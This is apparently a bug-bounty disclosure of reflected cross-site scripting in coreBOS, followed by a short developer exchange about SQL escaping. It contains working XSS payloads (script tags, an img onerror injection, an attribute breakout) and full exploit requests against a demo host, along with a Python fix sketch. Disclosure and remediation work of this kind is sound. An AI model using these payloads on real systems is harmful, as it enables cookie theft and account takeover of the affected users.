Cross-site Scripting (XSS) - Reflected in tsolucio/corebos
Reported on
Dec 20th 2021
Description
coreBOS is vulnerable to Reflected Cross-Site Scripting in the advft_criteria_groups and advft_criteria parameters.
Payload
- Outside the JSON object.
><script>alert(document.cookie)</script>
- Inside the JSON object.
[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:Vqvl14><img src=a onerror=alert(1)>znemq","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}]
Request
GET /index.php?module=Documents&action=Popup&html=Popup_picker&forfield=gendoctemplateburr&srcmodule=evvtgendoc&forrecord=&form=&query=true&search=true&searchtype=advance&advft_criteria=[{"groupid":"1","columnname":"vtiger_notes:template:template:Documents_Template:V","comparator":"e","value":"1","columncondition":"and"},{"groupid":"1","columnname":"vtiger_notes:template_for:template_for:Documents_Template_For:V","comparator":"e","value":"Accounts","columncondition":""}><script>alert(1)</script>&advft_criteria_groups=[null,{%22groupcondition%22:%22%22}]><script>alert(2)</script> HTTP/1.1
Host: demo.corebos.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: https://demo.corebos.com/index.php?action=index&module=evvtgendoc
Cookie: democoreboscom=8f928841548129a8317753f05afccd66; ck_login_id_vtiger=1; timezone=0; corebos_browsertabID=4101476105348538
Impact
This vulnerability can be used to steal users' cookies and achieve full account takeover with the victim's credentials.
Occurrences
RecycleBinUtils.php L41-L54
Get Request:
- parameter > type
https://demo.corebos.com/index.php?module=RecycleBin&action=RecycleBinAjax&file=index&mode=ajax&ajax=true&gname=&query=true&search_field=accountname&searchtype=BasicSearch&operator=s&type=alpbttb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k&search_text=Q&form=&forfield=&srcmodule=&forrecord=&selected_module=Accounts&__vt5rftk=sid:fb865148cbe7a0b1f0dd2c7a227b0c2c1a7d0667,1640278340&null=
Payload
press SHIFT + ALT + X to trigger the payload
tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k
NewReport0.php L109-L131
Get Request:
- parameter > reportmodule
https://demo.corebos.com/index.php?module=Reports&action=ReportsAjax&file=NewReport0&folder=13&reportmodule=Assetsacaco<script>alert(1)</script>kle7w&cbreporttype=directsq
Payload
Assetsacaco<script>alert(1)</script>kle7w
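As an added illustration (not coreBOS code, and written in Python rather than the project's PHP), the two layers a fix for these parameters needs: structural validation of the JSON parameters, which stops the "outside the JSON object" payload but not the "inside" one, and attribute-context output encoding, which neutralises both that one and the quote-breakout `type` payload. The sample values are shortened from the payloads above.

```python
import html
import json

# Constructed sample values, shortened from the report's payloads (not live data).
ADVFT_OUTSIDE = '[{"groupid":"1","comparator":"e"}]><script>alert(1)</script>'
ADVFT_INSIDE = ('[{"groupid":"1","columnname":"Vqvl14><img src=a onerror=alert(1)>znemq",'
                '"comparator":"e"}]')
TYPE_PARAM = 'tb9j2"accesskey="x"onclick="alert(1)"//qa8lof2qh5k'

def parse_criteria(raw):
    """Accept only a JSON list of objects. This rejects the 'outside the JSON
    object' payload, which is no longer valid JSON, but the 'inside' payload
    survives because its script sits in an ordinary string value."""
    try:
        data = json.loads(raw)
    except ValueError:
        return None
    if not isinstance(data, list) or not all(isinstance(g, dict) for g in data):
        return None
    return data

def attr(value):
    """HTML attribute encoding (the equivalent of PHP's htmlspecialchars with
    ENT_QUOTES): <, >, &, " and ' all become entities, so a value can neither
    close the attribute nor start a tag."""
    return html.escape(str(value), quote=True)

def render_hidden_vulnerable(name, value):
    # The pattern behind the report: the raw request value lands in an attribute.
    return '<input type="hidden" name="%s" value="%s">' % (name, value)

def render_hidden_safe(name, value):
    return '<input type="hidden" name="%s" value="%s">' % (attr(name), attr(value))

def render_criteria_safe(raw):
    """Both layers: validate the structure, then encode on output. Returns None
    when the input is not the expected JSON shape."""
    data = parse_criteria(raw)
    if data is None:
        return None
    return render_hidden_safe("advft_criteria", json.dumps(data))

def attribute_count(markup):
    """Number of '="' fragments in the rendered tag; a clean hidden input has
    exactly three (type, name, value), anything more is an injected attribute."""
    return markup.count('="')
```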
Hi @itsfading
Thank you so much for your effort. I really appreciate it. In coreBOS we do not use mysqli_real_escape_string; we use pquery instead:
$adb->pquery(SQL, array(of, parameters));
can you change those?
Hi Joe, I think you are referring to the SQL Injection report, and it is not related to anything here, right? I am not quite aware of the syntax of pquery and cannot find documentation for it. Also, it seems you are using it correctly in some places, but the vulnerability is still working; that's why I used mysqli_real_escape_string wherever you take input from the user.